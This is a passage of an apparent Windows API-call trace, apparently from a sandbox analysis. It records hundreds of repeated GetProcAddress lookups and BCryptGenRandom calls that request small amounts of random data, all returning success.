hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0168.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17231, cbBuffer=0x20, dwFlags=0x2 | out: pbBuffer=0x3a17231) returned 0x0 [0168.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0168.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0168.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0168.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17251, cbBuffer=0x2e, dwFlags=0x2 | out: pbBuffer=0x3a17251) returned 0x0 [0168.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.614] GetProcAddress 